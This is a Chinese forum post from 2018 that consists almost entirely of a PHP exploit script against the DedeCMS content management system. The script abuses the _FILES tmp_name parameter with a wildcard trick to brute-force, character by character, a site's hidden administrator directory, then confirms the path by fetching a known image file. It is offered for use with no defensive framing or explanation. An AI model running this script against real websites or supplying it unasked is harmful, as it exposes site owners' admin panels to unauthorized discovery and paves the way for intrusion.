anonymou5

 找回密码
 立即注册
搜索
查看: 178|回复: 0

dedecms爆后台目录

[复制链接]
匿名
匿名  发表于 2018-12-19 10:59:16 |阅读模式
  1. <?php
  2. $domain='http://dedecms.xxx.com/';
  3. $url=$domain.'/index.php';
  4. function post($url, $data, $cookie = '') {
  5.     $options = array(
  6.         CURLOPT_RETURNTRANSFER => true,
  7.         CURLOPT_HEADER => true,
  8.         CURLOPT_POST => true,
  9.         CURLOPT_SSL_VERIFYHOST => false,
  10.         CURLOPT_SSL_VERIFYHOST => false,
  11.         CURLOPT_COOKIE => $cookie,
  12.         CURLOPT_POSTFIELDS => $data,
  13.     );
  14.     $ch = curl_init($url);
  15.     curl_setopt_array($ch, $options);
  16.     $result = curl_exec($ch);
  17.     curl_close($ch);
  18.     return $result;
  19. }
  20. $testlen=25;
  21. $str=range('a','z');
  22. $number=range(0,9,1);
  23. $dic = array_merge($str, $number);
  24. $n=true;
  25. $nn=true;
  26. $path='';
  27. while($n){
  28.     foreach($dic as $v){
  29.         foreach($dic as $vv){
  30.             #echo $v.$vv .'----';
  31.             $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
  32.             $result=post($url,$post_data);
  33.             if(strpos($result,'Upload filetype not allow !') === false){
  34.                 $path=$v.$vv;$n=false;break 2;
  35.             }
  36.         }
  37.     }
  38. }
  39. while($nn){
  40.     foreach($dic as $vvv){
  41.         $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
  42.         $result=post($url,$post_data);
  43.         if(strpos($result,'Upload filetype not allow !') === false){
  44.             $path.=$vvv;
  45.             echo $path . PHP_EOL;
  46.             $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
  47.             if(@file_get_contents($giturl)){
  48.                 echo $domain.'/'.$path.'/';
  49.                 $nn=false;break 2;
  50.             }
  51.         }
  52.     }
  53. }
  54. ?>
复制代码
A2ED4301-0D48-4055-B1C2-1544DE896C98.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2019-3-21 14:19 , Processed in 0.134219 second(s), 22 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表